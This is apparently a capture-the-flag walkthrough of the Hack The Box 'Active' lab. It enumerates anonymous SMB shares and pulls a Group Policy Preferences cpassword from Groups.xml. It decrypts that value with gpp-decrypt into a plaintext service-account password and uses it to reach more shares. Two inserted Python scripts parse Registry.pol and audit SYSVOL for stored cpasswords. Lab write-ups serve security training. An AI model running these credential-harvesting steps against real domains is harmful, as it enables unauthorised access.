SMB
Nmap discovered a Microsoft Windows Directory service running on the target's ports 139 and 445.
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbmap -H dc.active.htb -d ACTIVE.HTB
[+] IP: dc.active.htb:445    Name: unknown
    Disk           Permissions    Comment
    ----           -----------    -------
    ADMIN$         NO ACCESS      Remote Admin
    C$             NO ACCESS      Default share
    IPC$           NO ACCESS      Remote IPC
    NETLOGON       NO ACCESS      Logon server share
    Replication    READ ONLY
    SYSVOL         NO ACCESS      Logon server share
    Users          NO ACCESS
It would appear that the SMB server allows anonymous login.
I have read-only privilege on the \\ACTIVE.HTB\Replication share.
The Replication share in Active Directory is used to replicate data between domain controllers in a Windows network. It serves as the location for storing the replicated files that keep domain controllers in the same domain consistent.
The Replication share is created during the installation of the first domain controller in a domain and is used to replicate the Active Directory database, SYSVOL, and other files between domain controllers in the same domain.
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/Replication
Password for [WORKGROUP\kali]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .               D    0  Sat Jul 21 12:37:44 2018
  ..              D    0  Sat Jul 21 12:37:44 2018
  active.htb      D    0  Sat Jul 21 12:37:44 2018

                5217023 blocks of size 4096. 284105 blocks available
smb: \> cd active.htb\
smb: \active.htb\> ls
  .               D    0  Sat Jul 21 12:37:44 2018
  ..              D    0  Sat Jul 21 12:37:44 2018
  DfsrPrivate     DHS  0  Sat Jul 21 12:37:44 2018
  Policies        D    0  Sat Jul 21 12:37:44 2018
  scripts         D    0  Wed Jul 18 20:48:57 2018

                5217023 blocks of size 4096. 284105 blocks available
smb: \active.htb\>
I went through the enumeration, and the \\ACTIVE.HTB\Replication share has two interesting files overall: Groups.xml and Registry.pol.
Both were downloaded for assessment.
Registry.pol
┌──(kali㉿kali)-[~/…/htb/labs/active/smb]
└─$ cat Registry.pol
Administrator1Policies\Microsoft\SystemCertificates\EFS;EFSBlob;;�;���8�-��=��v�0��0�k�tuB5 �B�,�_�'�0
0
UEFS1(0&U
Administrator11180624185345Z0P10Uificate0
0
UEFS1(0&U
�0� *�H��File Encryption Certificate0�"0
���&�L��?6\
>k� �f)�ZU��g#�渎{��2��t�!�$�t�c��R#i��S�>Y���l��J3G+ڻ&_�;�r.U���Xf_:R�pV��x��B3�J���6Ef��Z=l�N���҈LEA����L��p��1����+RkM��kZ�\��̅�d���2Q�{4�?���.qx��-ik)V^����!6����d��|�>��rcjj��Wbl���3��f��d������Ԓ��W0U0U%0
+�7
00U)0'�%
+�7�
�&�$AdmihVڻ[�\����m�P�D��ʄ�$�Ak�i��0�����.��0%�2ѴJ)���/�f���
���Zs��P��9���� ����#��r�{�lۦ�S�ߨ̻��胇�b��$7gYZ���Cwn}��@�`��&l�N��@7TˉP@��r��N�9r6cߌ�?��F݇��hH��(h�AckY�6U=��#�y/Y�UwFLƦ��M5I[Xq����&y���^v_��F.nt]�hs][Software\Policies\Microsoft\SystemCertificates\EFS\Certificates\3D33FC7B7C6F982A07A49A5C76DA805938A16C6A;Blob;;�;�l25535a36-4ee3-42b9-95d0-b2f03a28ac1aMicrosoft Enhanced Cryptographic Provider v1.Administrator1Y8�lj �0��0�k�tuB5 �B�,�_�'�0
0
UEFS1(0&U
Administrator11180624185345Z0P10Uificate0
0
UEFS1(0&U
�0� *�H��File Encryption Certificate0�"0
���&�L��?6\
>k� �f)�ZU��g#�渎{��2��t�!�$�t�c��R#i��S�>Y���l��J3G+ڻ&_�;�r.U���Xf_:R�pV��x��B3�J���6Ef��Z=l�N���҈LEA����L��p��1����+RkM��kZ�\��̅�d���2Q�{4�?���.qx��-ik)V^����!6����d��|�>��rcjj��Wbl���3��f��d������Ԓ��W0U0U%0
+�7
00U)0'�%
+�7�
�&�$AdmihVڻ[�\����m�P�D��ʄ�$�Ak�i��0�����.��0%�2ѴJ)���/�f���
���Zs��P��9���� ����#��r�{�lۦ�S�ߨ̻��胇�b��$7gYZ���Cwn}��@�`��&l�N��@7TˉP@��r��N�9r6cߌ�?��F݇��hH��(h�AckY�6U=��#�y/Y�UwFLƦ��M5I[Xq����&y���^v_��F.nt]�hs][Software\Policies\Microsoft\SystemCertificates\EFS\CRLs;;;;][Software\Policies\Microsoft\SystemCertificates\EFS\CTLs;;;;]
The Registry.pol file is a Registry Policy file (RPF) in binary format. Some of the strings point to the Administrator user.
The file was downloaded from \\ACTIVE.HTB\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol
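Rather than reading the raw bytes with cat, the file can be walked with a parser for its documented layout. The following is an added example, not code from the writeup: a standard-library Python parser for the Registry.pol format as published in MS-GPREG (an 8-byte "PReg" header followed by [key;value;type;size;data] entries encoded in UTF-16LE), together with a builder used only to construct a sample blob inline. The EFS key paths in the sample come from the dump above; the data bytes and the Example key are constructed placeholders.

```python
"""Parse the binary Registry.pol (Registry Policy) format.

Added example, not code from the original writeup. Layout per MS-GPREG:
an 8-byte header ("PReg" signature + version DWORD 1) followed by entries
    [key;value;type;size;data]
where the brackets and semicolons are UTF-16LE characters, key and value are
NUL-terminated UTF-16LE strings, type and size are little-endian DWORDs and
data is exactly `size` raw bytes. The sample entries below are constructed.
"""
import struct
import sys
from dataclasses import dataclass
from typing import List, Tuple

REG_TYPE_NAMES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
                  4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}


@dataclass
class PolEntry:
    key: str        # registry key path, e.g. Software\Policies\...
    value: str      # value name ("" for a key-only entry)
    reg_type: int   # REG_* type code
    data: bytes     # raw value data

    def decoded(self):
        """Render the raw data according to its registry type."""
        if self.reg_type in (1, 2):                      # REG_SZ / REG_EXPAND_SZ
            return self.data.decode("utf-16-le").rstrip("\x00")
        if self.reg_type == 4 and len(self.data) == 4:   # REG_DWORD
            return struct.unpack("<I", self.data)[0]
        if self.reg_type == 7:                           # REG_MULTI_SZ
            return [s for s in self.data.decode("utf-16-le").split("\x00") if s]
        return self.data                                 # REG_BINARY etc. stay raw


def _u16(ch: str) -> bytes:
    return ch.encode("utf-16-le")


def _read_utf16z(buf: bytes, pos: int) -> Tuple[str, int]:
    """Read a NUL-terminated UTF-16LE string starting at pos; return (text, next pos)."""
    end = pos
    while buf[end:end + 2] != b"\x00\x00":
        if end + 2 > len(buf):
            raise ValueError("unterminated UTF-16 string at offset %d" % pos)
        end += 2
    return buf[pos:end].decode("utf-16-le"), end + 2


def _expect(buf: bytes, pos: int, ch: str) -> int:
    """Consume one UTF-16LE delimiter character or fail loudly."""
    if buf[pos:pos + 2] != _u16(ch):
        raise ValueError("expected %r at offset %d" % (ch, pos))
    return pos + 2


def parse_registry_pol(buf: bytes) -> List[PolEntry]:
    """Return every [key;value;type;size;data] entry in a Registry.pol blob."""
    if buf[:4] != b"PReg":
        raise ValueError("missing PReg signature: not a Registry.pol file")
    version = struct.unpack_from("<I", buf, 4)[0]
    if version != 1:
        raise ValueError("unsupported Registry.pol version %d" % version)
    entries, pos = [], 8
    while pos < len(buf):
        pos = _expect(buf, pos, "[")
        key, pos = _read_utf16z(buf, pos)
        pos = _expect(buf, pos, ";")
        value, pos = _read_utf16z(buf, pos)
        pos = _expect(buf, pos, ";")
        reg_type = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, ";")
        data = buf[pos:pos + size]
        if len(data) != size:
            raise ValueError("truncated data for %s\\%s" % (key, value))
        pos = _expect(buf, pos + size, "]")
        entries.append(PolEntry(key, value, reg_type, data))
    return entries


def build_registry_pol(entries: List[PolEntry]) -> bytes:
    """Inverse of parse_registry_pol; used here only to construct a sample file."""
    out = bytearray(b"PReg" + struct.pack("<I", 1))
    for e in entries:
        out += _u16("[") + e.key.encode("utf-16-le") + b"\x00\x00"
        out += _u16(";") + e.value.encode("utf-16-le") + b"\x00\x00"
        out += _u16(";") + struct.pack("<I", e.reg_type)
        out += _u16(";") + struct.pack("<I", len(e.data))
        out += _u16(";") + e.data + _u16("]")
    return bytes(out)


# Constructed sample: the two EFS key paths visible in the dump above plus a
# DWORD and a string entry; the data bytes are placeholders, not real policy.
SAMPLE_ENTRIES = [
    PolEntry(r"Software\Policies\Microsoft\SystemCertificates\EFS", "EFSBlob", 3, b"\x01\x02\x03\x04"),
    PolEntry(r"Software\Policies\Microsoft\SystemCertificates\EFS\CRLs", "", 0, b""),
    PolEntry(r"Software\Policies\Example", "SampleDword", 4, struct.pack("<I", 1)),
    PolEntry(r"Software\Policies\Example", "SampleString", 1, "hello".encode("utf-16-le") + b"\x00\x00"),
]
SAMPLE_POL = build_registry_pol(SAMPLE_ENTRIES)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_POL
    for e in parse_registry_pol(blob):
        print("%-14s %s\\%s = %r" % (REG_TYPE_NAMES.get(e.reg_type, e.reg_type),
                                     e.key, e.value, e.decoded()))
```

Run it with a path argument to list a real Registry.pol; with no argument it parses the constructed sample. Every delimiter is checked, so a truncated or hand-edited file fails with an offset instead of silently producing partial entries, which is the behaviour you want when the file is being reviewed as evidence of what a GPO enforces.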
Groups.xml
┌──(kali㉿kali)-[~/…/htb/labs/active/smb]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
The Groups.xml file is an XML file, initially downloaded from \\ACTIVE.HTB\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
As the download directory suggests, the file is part of Active Directory Group Policy Preferences.
The file also contains a user credential in its attributes, including name and cpassword.
The username is SVC_TGS
The password string is edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
The password string above is likely the encrypted GPP cpassword string, which can be decrypted easily with the tool gpp-decrypt.
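From the defender's side the question is not only what one cpassword decrypts to but whether any preference file under SYSVOL still carries one at all, since the attribute is AES-encrypted with a key Microsoft published (MS14-025) and is therefore readable to anyone with access to the share. The following is an added example, not code from the writeup: a standard-library Python audit that parses GPP preference XML (Groups.xml and the other preference files known to carry cpassword), reports each stored credential with its item, account, GPO GUID and last-changed stamp, and can walk a whole SYSVOL or Replication mirror. The sample documents are constructed; the cpassword blob in them is a placeholder, not a real encrypted password.

```python
"""Audit Group Policy Preference (GPP) XML files for stored cpassword values.

Added example, not code from the original writeup; standard library only.
GPP writes credentials into preference XML under SYSVOL as a cpassword
attribute that is AES-encrypted with a key Microsoft published, so any
non-empty cpassword readable from SYSVOL (or a share mirroring it, such as
Replication here) is a finding. The sample documents below are constructed;
the cpassword blob is a placeholder, not a real encrypted password.
"""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from pathlib import Path
from typing import List, Optional

# Preference files that can carry a cpassword (the MS14-025 list).
GPP_FILE_NAMES = {"groups.xml", "services.xml", "scheduledtasks.xml",
                  "datasources.xml", "drives.xml", "printers.xml"}
# Attribute naming the affected account; it differs per preference type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")
GPO_GUID_RE = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


@dataclass
class CpasswordFinding:
    path: str                # file the value came from
    gpo_guid: Optional[str]  # GPO GUID parsed from the path, if any
    item: str                # element holding the credential: User, Task, ...
    account: Optional[str]   # account the credential belongs to
    cpassword: str           # the base64 AES blob itself
    changed: Optional[str]   # GPP's last-changed stamp on the item


def find_cpasswords(xml_text: str, path: str = "<memory>") -> List[CpasswordFinding]:
    """Return one finding per non-empty cpassword attribute in one GPP document."""
    root = ET.fromstring(xml_text)
    m = GPO_GUID_RE.search(path)
    gpo_guid = m.group(0) if m else None
    # child -> parent map so a <Properties> hit can be tied to its item element
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        cpassword = elem.attrib.get("cpassword", "")
        if not cpassword:
            continue  # cpassword="" means no password is stored: not a finding
        item = parent_of.get(elem, elem)
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if elem.attrib.get(a)), None)
        findings.append(CpasswordFinding(path, gpo_guid, item.tag, account,
                                         cpassword, item.attrib.get("changed")))
    return findings


def scan_sysvol(root: Path) -> List[CpasswordFinding]:
    """Walk a SYSVOL (or Replication) mirror and audit every GPP preference file."""
    findings = []
    for xml_path in root.rglob("*.xml"):
        if xml_path.name.lower() not in GPP_FILE_NAMES:
            continue
        try:
            text = xml_path.read_text(encoding="utf-8-sig")
            findings.extend(find_cpasswords(text, str(xml_path)))
        except (ET.ParseError, OSError) as exc:
            print("[!] skipping %s: %s" % (xml_path, exc))
    return findings


# Constructed samples mirroring the Groups.xml layout seen on the share.
SAMPLE_PATH = r"Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml"
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDERblobNotARealSecret" neverExpires="1" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""
# Same layout with the password left unset: must produce no finding.
SAMPLE_CLEAN_XML = SAMPLE_GROUPS_XML.replace(
    'cpassword="PLACEHOLDERblobNotARealSecret"', 'cpassword=""')


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, SAMPLE_PATH):
        print("[+] %s: %s %r has a stored cpassword (changed %s, GPO %s)"
              % (f.path, f.item, f.account, f.changed, f.gpo_guid))
```

Point scan_sysvol at a local copy of the Policies tree to get the full list; the changed stamp tells you how long the credential has been exposed, and the fix for each finding is to delete the preference item and rotate the account's password, since removing the file alone does not invalidate a password that has already been read.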
Decryption
┌──(kali㉿kali)-[~/…/htb/labs/active/smb]
└─$ gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
GPPstillStandingStrong2k18
gpp-decrypt is natively available in Kali.
The actual password for the SVC_TGS user is GPPstillStandingStrong2k18
Before jumping into any other attacks, I first have to confirm that this is indeed a valid credential.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbmap -H dc.active.htb -d ACTIVE.HTB -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
[+] IP: dc.active.htb:445    Name: unknown
    Disk           Permissions    Comment
    ----           -----------    -------
    ADMIN$         NO ACCESS      Remote Admin
    C$             NO ACCESS      Default share
    IPC$           NO ACCESS      Remote IPC
    NETLOGON       READ ONLY      Logon server share
    Replication    READ ONLY
    SYSVOL         READ ONLY      Logon server share
    Users          READ ONLY
The SVC_TGS user is confirmed to be a valid user.
Based on the naming, it would appear to be a service account.
I also discovered that there are now three additional SMB shares available for enumeration with this credential.
SVC_TGS Session
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/NETLOGON -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
  .               D    0  Wed Jul 18 20:48:57 2018
  ..              D    0  Wed Jul 18 20:48:57 2018

                5217023 blocks of size 4096. 279064 blocks available
The //ACTIVE.HTB/NETLOGON share is empty.
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/SYSVOL -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
  .               D    0  Wed Jul 18 20:48:57 2018
  ..              D    0  Wed Jul 18 20:48:57 2018
  active.htb      Dr   0  Wed Jul 18 20:48:57 2018

                5217023 blocks of size 4096. 279064 blocks available
The Replication share is used to replicate the Active Directory database, while the SYSVOL share is used to replicate the GPOs and logon scripts for a domain.
However, the //ACTIVE.HTB/SYSVOL share appears to be more or less the same as the //ACTIVE.HTB/Replication share.
┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ smbclient //ACTIVE.HTB/Users -U 'SVC_TGS%GPPstillStandingStrong2k18'
Try "help" to get a list of possible commands.
smb: \> ls
  .               DR       0  Sat Jul 21 16:39:20 2018
  ..              DR       0  Sat Jul 21 16:39:20 2018
  Administrator   D        0  Mon Jul 16 12:14:21 2018
  All Users       DHSrn    0  Tue Jul 14 07:06:44 2009
  Default         DHR      0  Tue Jul 14 08:38:21 2009
  Default User    DHSrn    0  Tue Jul 14 07:06:44 2009
  desktop.ini     AHS    174  Tue Jul 14 06:57:55 2009
  Public          DR       0  Tue Jul 14 06:57:55 2009
  SVC_TGS         D        0  Sat Jul 21 17:16:32 2018

                5217023 blocks of size 4096. 279064 blocks available
smb: \Administrator\> dir
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \> cd All Users\
cd \All\: NT_STATUS_OBJECT_NAME_NOT_FOUND
The //ACTIVE.HTB/Users share appears to mirror the C:\Users system directory.